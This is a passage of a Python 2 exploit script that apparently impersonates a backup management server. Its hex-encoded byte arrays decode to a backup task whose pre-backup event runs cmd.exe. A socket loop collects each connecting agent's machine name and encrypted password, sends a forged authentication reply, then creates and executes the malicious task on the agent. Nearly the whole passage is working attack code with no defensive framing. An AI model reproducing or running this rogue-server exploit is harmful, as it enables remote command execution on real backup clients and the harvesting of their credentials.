0x20, 0x00, 0x65, 0x00, 0x76, 0x00, 0x65, 0x00, 
0x6e, 0x00, 0x74, 0x00, 0x73, 0x00, 0x3d, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x22, 0x00, 0x22, 0x00, 
0x45, 0x00, 0x58, 0x00, 0x45, 0x00, 0x43, 0x00, 
0x55, 0x00, 0x54, 0x00, 0x45, 0x00, 0x2c, 0x00, 
0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x57, 0x00, 
0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 
0x77, 0x00, 0x73, 0x00, 0x5c, 0x00, 0x53, 0x00, 
0x79, 0x00, 0x73, 0x00, 0x74, 0x00, 0x65, 0x00, 
0x6d, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5c, 0x00, 
0x63, 0x00, 0x6d, 0x00, 0x64, 0x00, 0x2e, 0x00, 
0x65, 0x00, 0x78, 0x00, 0x65, 0x00, 0x2c, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x22, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x50, 0x00, 0x6f, 0x00, 0x73, 0x00, 
0x74, 0x00, 0x20, 0x00, 0x62, 0x00, 0x61, 0x00, 
0x63, 0x00, 0x6b, 0x00, 0x75, 0x00, 0x70, 0x00, 
0x20, 0x00, 0x65, 0x00, 0x76, 0x00, 0x65, 0x00, 
0x6e, 0x00, 0x74, 0x00, 0x73, 0x00, 0x3d, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x41, 0x00, 0x62, 0x00, 0x6f, 0x00, 
0x72, 0x00, 0x74, 0x00, 0x20, 0x00, 0x69, 0x00, 
0x66, 0x00, 0x20, 0x00, 0x70, 0x00, 0x72, 0x00, 
0x65, 0x00, 0x2d, 0x00, 0x65, 0x00, 0x76, 0x00, 
0x65, 0x00, 0x6e, 0x00, 0x74, 0x00, 0x20, 0x00, 
0x66, 0x00, 0x61, 0x00, 0x69, 0x00, 0x6c, 0x00, 
0x73, 0x00, 0x3d, 0x00, 0x66, 0x00, 0x61, 0x00, 
0x6c, 0x00, 0x73, 0x00, 0x65, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 
0x41, 0x00, 0x62, 0x00, 0x6f, 0x00, 0x72, 0x00, 
0x74, 0x00, 0x20, 0x00, 0x69, 0x00, 0x66, 0x00, 
0x20, 0x00, 0x70, 0x00, 0x6f, 0x00, 0x73, 0x00, 
0x74, 0x00, 0x2d, 0x00, 0x65, 0x00, 0x76, 0x00, 
0x65, 0x00, 0x6e, 0x00, 0x74, 0x00, 0x20, 0x00, 
0x66, 0x00, 0x61, 0x00, 0x69, 0x00, 0x6c, 0x00, 
0x73, 0x00, 0x3d, 0x00, 0x66, 0x00, 0x61, 0x00, 
0x6c, 0x00, 0x73, 0x00, 0x65, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x2c, 0x00, 0x4d, 0x00, 0x69, 0x00, 
0x72, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x72, 0x00, 
0x3d, 0x00, 0x66, 0x00, 0x61, 0x00, 0x6c, 0x00,
0x73, 0x00, 0x65, 0x00, 0x2c, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x41, 0x00, 0x62, 0x00, 0x73, 0x00, 
0x6f, 0x00, 0x6c, 0x00, 0x75, 0x00, 0x74, 0x00, 
0x65, 0x00, 0x20, 0x00, 0x70, 0x00, 0x61, 0x00, 
0x74, 0x00, 0x68, 0x00, 0x73, 0x00, 0x3d, 0x00, 
0x66, 0x00, 0x61, 0x00, 0x6c, 0x00, 0x73, 0x00, 
0x65, 0x00, 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x41, 0x00, 0x6c, 0x00, 
0x77, 0x00, 0x61, 0x00, 0x79, 0x00, 0x73, 0x00, 
0x20, 0x00, 0x63, 0x00, 0x72, 0x00, 0x65, 0x00, 
0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x20, 0x00, 
0x74, 0x00, 0x6f, 0x00, 0x70, 0x00, 0x20, 0x00, 
0x64, 0x00, 0x69, 0x00, 0x72, 0x00, 0x65, 0x00, 
0x63, 0x00, 0x74, 0x00, 0x6f, 0x00, 0x72, 0x00, 
0x79, 0x00, 0x3d, 0x00, 0x74, 0x00, 0x72, 0x00, 
0x75, 0x00, 0x65, 0x00, 0x22, 0x00, 0x22, 0x00, 
0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x43, 0x00, 
0x6c, 0x00, 0x65, 0x00, 0x61, 0x00, 0x72, 0x00, 
0x20, 0x00, 0x61, 0x00, 0x72, 0x00, 0x63, 0x00, 
0x68, 0x00, 0x69, 0x00, 0x76, 0x00, 0x65, 0x00, 
0x20, 0x00, 0x61, 0x00, 0x74, 0x00, 0x74, 0x00, 
0x72, 0x00, 0x69, 0x00, 0x62, 0x00, 0x75, 0x00, 
0x74, 0x00, 0x65, 0x00, 0x3d, 0x00, 0x74, 0x00, 
0x72, 0x00, 0x75, 0x00, 0x65, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 
0x49, 0x00, 0x6e, 0x00, 0x63, 0x00, 0x6c, 0x00, 
0x75, 0x00, 0x64, 0x00, 0x65, 0x00, 0x20, 0x00, 
0x62, 0x00, 0x61, 0x00, 0x63, 0x00, 0x6b, 0x00, 
0x75, 0x00, 0x70, 0x00, 0x20, 0x00, 0x74, 0x00, 
0x79, 0x00, 0x70, 0x00, 0x65, 0x00, 0x3d, 0x00, 
0x74, 0x00, 0x72, 0x00, 0x75, 0x00, 0x65, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x44, 0x00, 0x65, 0x00, 0x6c, 0x00, 
0x65, 0x00, 0x74, 0x00, 0x65, 0x00, 0x20, 0x00, 
0x65, 0x00, 0x6d, 0x00, 0x70, 0x00, 0x74, 0x00, 
0x79, 0x00, 0x20, 0x00, 0x64, 0x00, 0x69, 0x00, 
0x72, 0x00, 0x65, 0x00, 0x63, 0x00, 0x74, 0x00, 
0x6f, 0x00, 0x72, 0x00, 0x69, 0x00, 0x65, 0x00, 
0x73, 0x00, 0x3d, 0x00, 0x66, 0x00, 0x61, 0x00, 
0x6c, 0x00, 0x73, 0x00, 0x65, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x2c, 0x00, 0x49, 0x00, 0x6d, 0x00, 
0x70, 0x00, 0x65, 0x00, 0x72, 0x00, 0x73, 0x00, 
0x6f, 0x00, 0x6e, 0x00, 0x61, 0x00, 0x74, 0x00, 
0x65, 0x00, 0x3d, 0x00, 0x66, 0x00, 0x61, 0x00, 
0x6c, 0x00, 0x73, 0x00, 0x65, 0x00, 0x2c, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x41, 0x00, 0x62, 0x00, 
0x6f, 0x00, 0x72, 0x00, 0x74, 0x00, 0x20, 0x00, 
0x69, 0x00, 0x66, 0x00, 0x20, 0x00, 0x69, 0x00, 
0x6d, 0x00, 0x70, 0x00, 0x65, 0x00, 0x72, 0x00, 
0x73, 0x00, 0x6f, 0x00, 0x6e, 0x00, 0x61, 0x00, 
0x74, 0x00, 0x69, 0x00, 0x6f, 0x00, 0x6e, 0x00, 
0x20, 0x00, 0x66, 0x00, 0x61, 0x00, 0x69, 0x00, 
0x6c, 0x00, 0x73, 0x00, 0x3d, 0x00, 0x66, 0x00, 
0x61, 0x00, 0x6c, 0x00, 0x73, 0x00, 0x65, 0x00, 
0x22, 0x00, 0x22, 0x00,
0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x52, 0x00, 
0x75, 0x00, 0x6e, 0x00, 0x20, 0x00, 0x61, 0x00, 
0x73, 0x00, 0x20, 0x00, 0x55, 0x00, 0x73, 0x00, 
0x65, 0x00, 0x72, 0x00, 0x20, 0x00, 0x6e, 0x00, 
0x61, 0x00, 0x6d, 0x00, 0x65, 0x00, 0x3d, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x52, 0x00, 0x75, 0x00, 0x6e, 0x00, 
0x20, 0x00, 0x61, 0x00, 0x73, 0x00, 0x20, 0x00, 
0x44, 0x00, 0x6f, 0x00, 0x6d, 0x00, 0x61, 0x00, 
0x69, 0x00, 0x6e, 0x00, 0x3d, 0x00, 0x2e, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x52, 0x00, 0x75, 0x00, 0x6e, 0x00, 
0x20, 0x00, 0x61, 0x00, 0x73, 0x00, 0x20, 0x00, 
0x50, 0x00, 0x61, 0x00, 0x73, 0x00, 0x73, 0x00, 
0x77, 0x00, 0x6f, 0x00, 0x72, 0x00, 0x64, 0x00, 
0x3d, 0x00, 0x59, 0x00, 0x77, 0x00, 0x42, 0x00, 
0x69, 0x00, 0x41, 0x00, 0x47, 0x00, 0x51, 0x00, 
0x41, 0x00, 0x66, 0x00, 0x41, 0x00, 0x42, 0x00, 
0x36, 0x00, 0x41, 0x00, 0x48, 0x00, 0x77, 0x00, 
0x41, 0x00, 0x5a, 0x00, 0x51, 0x00, 0x42, 0x00, 
0x69, 0x00, 0x41, 0x00, 0x47, 0x00, 0x51, 0x00, 
0x41, 0x00, 0x63, 0x00, 0x67, 0x00, 0x41, 0x00, 
0x34, 0x00, 0x41, 0x00, 0x48, 0x00, 0x51, 0x00, 
0x41, 0x00, 0x45, 0x00, 0x77, 0x00, 0x41, 0x00, 
0x44, 0x00, 0x41, 0x00, 0x41, 0x00, 0x77, 0x00, 
0x41, 0x00, 0x63, 0x00, 0x77, 0x00, 0x42, 0x00, 
0x6d, 0x00, 0x41, 0x00, 0x48, 0x00, 0x55, 0x00, 
0x41, 0x00, 0x61, 0x00, 0x41, 0x00, 0x41, 0x00, 
0x64, 0x00, 0x41, 0x00, 0x41, 0x00, 0x45, 0x00, 
0x41, 0x00, 0x63, 0x00, 0x67, 0x00, 0x42, 0x00, 
0x68, 0x00, 0x41, 0x00, 0x48, 0x00, 0x49, 0x00, 
0x41, 0x00, 0x61, 0x00, 0x51, 0x00, 0x41, 0x00, 
0x45, 0x00, 0x41, 0x00, 0x41, 0x00, 0x38, 0x00, 
0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x42, 0x00, 
0x34, 0x00, 0x41, 0x00, 0x42, 0x00, 0x30, 0x00, 
0x41, 0x00, 0x62, 0x00, 0x77, 0x00, 0x41, 0x00, 
0x4a, 0x00, 0x41, 0x00, 0x47, 0x00, 0x41, 0x00, 
0x41, 0x00, 0x64, 0x00, 0x77, 0x00, 0x42, 0x00, 
0x6a, 0x00, 0x41, 0x00, 0x43, 0x00, 0x77, 0x00, 
0x41, 0x00, 0x44, 0x00, 0x41, 0x00, 0x41, 0x00, 
0x42, 0x00, 0x41, 0x00, 0x48, 0x00, 0x34, 0x00, 
0x41, 0x00, 0x47, 0x00, 0x77, 0x00, 0x42, 0x00, 
0x70, 0x00, 0x41, 0x00, 0x41, 0x00, 0x73, 0x00, 
0x41, 0x00, 0x65, 0x00, 0x67, 0x00, 0x42, 0x00, 
0x31, 0x00, 0x41, 0x00, 0x47, 0x00, 0x41, 0x00, 
0x41, 0x00, 0x61, 0x00, 0x41, 0x00, 0x41, 0x00, 
0x4d, 0x00, 0x41, 0x00, 0x44, 0x00, 0x59, 0x00, 
0x41, 0x00, 0x5a, 0x00, 0x77, 0x00, 0x41, 0x00, 
0x69, 0x00, 0x41, 0x00, 0x41, 0x00, 0x3d, 0x00, 
0x3d, 0x00, 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 
0x2f, 0x00, 0x2f, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x7d, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x0d, 0x00, 
0x0a, 0x00 ]

execute_template = [
0x42, 0x00, 0x41, 0x00, 0x43, 0x00, 0x4b, 0x00, 
0x55, 0x00, 0x50, 0x00, 0x5f, 0x00, 0x53, 0x00, 
0x45, 0x00, 0x4c, 0x00, 0x45, 0x00, 0x43, 0x00, 
0x54, 0x00, 0x45, 0x00, 0x44, 0x00, 0x2c, 0x00, 
0x7b, 0x00, 0x45, 0x00, 0x37, 0x00, 0x45, 0x00, 
0x43, 0x00, 0x46, 0x00, 0x34, 0x00, 0x32, 0x00, 
0x44, 0x00, 0x2d, 0x00, 0x37, 0x00, 0x38, 0x00, 
0x45, 0x00, 0x34, 0x00, 0x2d, 0x00, 0x34, 0x00, 
0x32, 0x00, 0x34, 0x00, 0x38, 0x00, 0x2d, 0x00, 
0x42, 0x00, 0x37, 0x00, 0x45, 0x00, 0x45, 0x00, 
0x2d, 0x00, 0x33, 0x00, 0x38, 0x00, 0x39, 0x00, 
0x35, 0x00, 0x33, 0x00, 0x36, 0x00, 0x44, 0x00, 
0x38, 0x00, 0x42, 0x00, 0x44, 0x00, 0x33, 0x00, 
0x38, 0x00, 0x7d, 0x00, 0x2c, 0x00, 0x66, 0x00, 
0x61, 0x00, 0x6c, 0x00, 0x73, 0x00, 0x65, 0x00, 
0x0d, 0x00, 0x0a, 0x00]


#### I know, I know, just wanted to try it fast don't hate me because this shit
create_task = ""
for x in task_template:
	create_task = create_task + chr(x)

execute_task = ""
for x in execute_template:
	execute_task = execute_task + chr(x)

###### Client handler
def clients(conn):
	data = conn.recv(1024).split(",")
	print " -> Machine: " + data[2]
	print " -> Encrypted Password:\n" + data[1]
	conn.send(password_ok.decode("hex"))

	ping = conn.recv(1024)
	print "[+] Creating new task..."
	conn.send(create_task)
	ack = conn.recv(1024).split(",")
	print "[+] " + ack[0]
	conn.send(iddle.decode("hex"))
	ping = conn.recv(1024)
	print "[+] Executing task..."
	conn.send(execute_task)
	ack = conn.recv(1024).split(",")
	print "[+] Is it OK? " + ack[0]
	conn.close()


####### Main 
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
	sock.bind((host, port))
except socket.error as msg:
	print "Error: " + str(msg) + " - " + msg[1]
	sys.exit(1)
sock.listen(10)

while 1:
	conn, addr = sock.accept()
	print "[+] New client connected from " + addr[0]
	start_new_thread(clients, (conn,))
sock.close()